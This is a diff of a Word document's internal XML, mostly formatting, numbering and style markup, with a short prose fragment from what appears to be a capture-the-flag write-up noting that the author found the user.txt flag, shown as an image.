+        <w:t xml:space="preserve"> probably</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">was </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> each time</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>certain amount of tim</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>And there I found the user.txt file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> its flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B4DD78E" wp14:editId="5453433E">
+            <wp:extent cx="1867062" cy="743014"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1877876094" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1877876094" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1867062" cy="743014"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
-      <w:cols w:space="720" w:num="1"/>
-      <w:docGrid w:linePitch="360" w:charSpace="0"/>
+      <w:cols w:space="720"/>
+      <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
 </w:document>
 </file>
 
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6B0B5C5B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="162295D0"/>
+    <w:lvl w:ilvl="0" w:tplc="307E9E0E">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Symbol" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1" w16cid:durableId="486288727">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
+</file>
+
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
+        <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="he-IL"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault/>
   </w:docDefaults>
-  <w:latentStyles w:count="260" w:defQFormat="0" w:defUnhideWhenUsed="1" w:defSemiHidden="1" w:defUIPriority="99" w:defLockedState="0">
-    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Normal"/>
-    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="heading 1"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="heading 2"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="heading 3"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="heading 4"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="heading 5"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="heading 6"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="heading 7"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="heading 8"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="heading 9"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 7"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 8"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index 9"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 7"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 8"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toc 9"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Normal Indent"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="footnote text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="annotation text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="header"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="footer"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="index heading"/>
-    <w:lsdException w:qFormat="1" w:uiPriority="0" w:name="caption"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="table of figures"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="envelope address"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="envelope return"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="footnote reference"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="annotation reference"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="line number"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="page number"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="endnote reference"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="endnote text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="table of authorities"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="macro"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="toa heading"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Bullet"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Number"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Bullet 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Bullet 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Bullet 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Bullet 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Number 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Number 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Number 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Number 5"/>
-    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Title"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Closing"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Signature"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:name="Default Paragraph Font"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text Indent"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Continue"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Continue 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Continue 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Continue 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Continue 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Message Header"/>
-    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Subtitle"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Salutation"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Date"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text First Indent"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text First Indent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Note Heading"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text Indent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text Indent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Block Text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Hyperlink"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="FollowedHyperlink"/>
-    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Strong"/>
-    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Emphasis"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Document Map"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Plain Text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="E-mail Signature"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Normal (Web)"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Acronym"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Address"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Cite"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Code"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Definition"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Keyboard"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Preformatted"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Sample"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Typewriter"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Variable"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:name="Normal Table"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="annotation subject"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Simple 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Simple 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Simple 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Classic 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Classic 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Classic 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Classic 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Colorful 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Colorful 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Colorful 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Columns 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Columns 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Columns 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Columns 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Columns 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid 7"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid 8"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table List 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table List 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table List 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table List 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table List 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table List 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table List 7"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table List 8"/>
